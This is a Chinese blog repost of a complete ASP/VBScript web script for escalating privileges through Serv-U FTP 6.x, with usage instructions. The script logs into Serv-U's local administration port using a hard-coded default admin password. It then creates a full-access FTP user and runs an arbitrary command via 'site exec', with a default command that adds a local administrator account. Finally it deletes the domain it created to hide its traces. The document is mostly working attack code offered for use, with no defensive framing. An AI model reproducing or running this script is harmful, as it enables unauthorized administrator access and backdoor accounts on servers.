Serv-U 6.X 提权脚本

最新推荐文章于 2023-07-12 08:48:42 发布

weixin_30691871

最新推荐文章于 2023-07-12 08:48:42 发布

阅读量144

点赞数

原文链接：http://www.cnblogs.com/3xp10d3r/articles/1038528.html

版权

信息来源： http://www.cnsst.org/
Author:落叶纷飞

使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。

< %@ LANGUAGE = VBScript % >
2

< %
3

Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4

dim action
5

action = request( " action " )
6

if not isnumeric (action) then response.end
7

user = trim (request( " u " ))
8

pass = trim (request( " p " ))
9

port = trim (request( " port " ))
10

cmd = trim (request( " c " ))
11

f = trim (request( " f " ))
12

if f = "" then
13

f = gpath()
14

else
15

f = left (f, 2 )
16

end if
17

ftpport = ffport
18

timeout = 3
19

loginuser = " User " & user & vbCrLf
21

loginpass = " Pass " & pass & vbCrLf
22

deldomain = " -DELETEDOMAIN " & vbCrLf & " -IP= " & iip & vbCrLf & " PortNo= " & ftpport & vbCrLf
23

mt = " SITE MAINTENANCE " & vbCrLf
24

newdomain = " -SETDOMAIN " & vbCrLf & " -Domain=leaves| " & iip & " | " & ftpport & " |-1|1|0 " & vbCrLf & " -TZOEnable=0 " & vbCrLf & " TZOKey= " & vbCrLf
25

newuser = " -SETUSERSETUP " & vbCrLf & " -IP=0.0.0.0 " & vbCrLf & " -PortNo= " & ftpport & vbCrLf & " -User=luo " & vbCrLf & " -Password=ye " & vbCrLf & _
26

" -HomeDir=c:\\ " & vbCrLf & " -LoginMesFile= " & vbCrLf & " -Disable=0 " & vbCrLf & " -RelPaths=1 " & vbCrLf & _
27

" -NeedSecure=0 " & vbCrLf & " -HideHidden=0 " & vbCrLf & " -AlwaysAllowLogin=0 " & vbCrLf & " -ChangePassword=0 " & vbCrLf & _
28

" -QuotaEnable=0 " & vbCrLf & " -MaxUsersLoginPerIP=-1 " & vbCrLf & " -SpeedLimitUp=0 " & vbCrLf & " -SpeedLimitDown=0 " & vbCrLf & _
29

" -MaxNrUsers=-1 " & vbCrLf & " -IdleTimeOut=600 " & vbCrLf & " -SessionTimeOut=-1 " & vbCrLf & " -Expire=0 " & vbCrLf & " -RatioUp=1 " & vbCrLf & _
30

" -RatioDown=1 " & vbCrLf & " -RatiosCredit=0 " & vbCrLf & " -QuotaCurrent=0 " & vbCrLf & " -QuotaMaximum=0 " & vbCrLf & _
31

" -Maintenance=System " & vbCrLf & " -PasswordType=Regular " & vbCrLf & " -Ratios=None " & vbCrLf & " Access=c:\\|RWAMELCDP " & vbCrLf
32

quit = " QUIT " & vbCrLf
33

newuser = replace (newuser, " c: " ,f)
34

select case action
35

case 1
36

set a = Server.CreateObject( " Microsoft.XMLHTTP " )
37

a.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s1 " , True , "" , ""
38

a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39

set session( " a " ) = a
40

% >
41

< form method = " post " name = " leaves " >
42

< input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
43

< input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
44

< input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
45

< input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
46

< input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
47

< input name = " action " type = " hidden " id = " action " value = " 2 " ></ form >
48

< script language = " javascript " >
49

document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令：<%=pass%>

<center>');
50

setTimeout( " document.all.leaves.submit(); " , 4000 );
51

</ script >
52

< %
53

case 2
54

set b = Server.CreateObject( " Microsoft.XMLHTTP " )
55

b.open " GET " , " http://127.0.0.1: " & ftpport & " /leaves/upadmin/s2 " , True , "" , ""
56

b.send " User luo " & vbCrLf & " pass ye " & vbCrLf & " site exec " & cmd & vbCrLf & quit
57

set session( " b " ) = b
58

% >
59

< form method = " post " name = " leaves " >
60

< input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
61

< input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
62

< input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
63

< input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
64

< input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
65

< input name = " action " type = " hidden " id = " action " value = " 3 " ></ form >
66

< script language = " javascript " >
67

document.write( ' <center>正在提升权限,请等待

,<center>');
68

setTimeout( " document.all.leaves.submit(); " , 4000 );
69

</ script >
70

< %
71

case 3
72

set c = Server.CreateObject( " Microsoft.XMLHTTP " )
73

c.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s3 " , True , "" , ""
74

c.send loginuser & loginpass & mt & deldomain & quit
75

set session( " c " ) = c
76

% >
77

< center > 提权完毕,已执行了命令：
78

< font color = red >< % = cmd% ></ font >
79

< input type = button value = " 返回继续 " onClick = " location.href='<%=gname()%>'; " >
82

</ center >
83

< %
85

case else
86

on error resume next
87

set a = session( " a " )
88

set b = session( " b " )
89

set c = session( " c " )
90

a.abort
91

Set a = Nothing
92

b.abort
93

Set b = Nothing
94

c.abort
95

Set c = Nothing
96

% >
97

< center >< form method = " post " name = " leaves " >
98

< tr align = " center " valign = " middle " >
99

< td colspan = " 2 " > Serv - U 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100

101

</ tr >
102

< tr align = " center " valign = " middle " >
103

< td width = " 200 " > 用户名: </ td >
104

105

< td width = " 400 " >< input name = " u " type = " text " id = " u " value = " LocalAdministrator " ></ td >
106

107

</ tr >
108

< tr align = " center " valign = " middle " >
109

< td > 口　令： </ td >
110

111

< td >< input name = " p " type = " text " id = " p " value = " #l@$ak#.lk;0@P " ></ td >
112

113

</ tr >
114

< tr align = " center " valign = " middle " >
115

< td > 端　口： </ td >
116

117

< td >< input name = " port " type = " text " id = " port " value = " 43958 " ></ td >
118

119

服务器端口：
120

121

< td >< input name = " ffport " type = " text " id = " ffport " value = " 65500 " ></ td >
122

123

服务器IP：
124

125

< td >< input name = " iip " type = " text " id = " iip " value = " 0.0.0.0 " ></ td >
126

127

</ tr >
128

< tr align = " center " valign = " middle " >
129

< td > 系统路径： </ td >
130

131

< td >< input name = " f " type = " text " id = " f " value = " <%=f%> " size = " 8 " ></ td >
132

133

</ tr >
134

< tr align = " center " valign = " middle " >
135

< td > 命　令： </ td >
136

137

< td >< input name = " c " type = " text " id = " c " value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add " size = " 50 " ></ td >
138

139

</ tr >
140

< tr align = " center " valign = " middle " >
141

< td colspan = " 2 " >< input type = " submit " name = " Submit " value = " 提交 " >
142

< input type = " reset " name = " Submit2 " value = " 重置 " >
143

< input name = " action " type = " hidden " id = " action " value = " 1 " ></ td >
144

</ tr >
145

</ form ></ center >
146

147

148

使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。
149

< % end select
150

function Gpath()
151

on error resume next
152

err.clear
153

set f = Server.CreateObject( " Scripting.FileSystemObject " )
154

if err.number > 0 then
155

gpath = " c: "
156

exit function
157

end if
158

gpath = f.GetSpecialFolder( 0 )
159

gpath = lcase ( left (gpath, 2 ))
160

set f = nothing
161

end function
162

Function GName()
163

If request.servervariables( " SERVER_PORT " ) = " 80 " Then
164

GName = " http:// " & request.servervariables( " server_name " ) & lcase (request.servervariables( " script_name " ))
165

Else
166

GName = " http:// " & request.servervariables( " server_name " ) & " : " & request.servervariables( " SERVER_PORT " ) & lcase (request.servervariables( " script_name " ))
167

End If
168

End Function
169

% >
170

转载于:https://www.cnblogs.com/3xp10d3r/articles/1038528.html

weixin_30691871

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Serv-U 6.X 提权脚本

信息来源：http://www.cnsst.org/Author:落叶纷飞使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。1<%@LANGUAGE=VBScript%>2<%3Dimuser,pass,po...
复制链接

扫一扫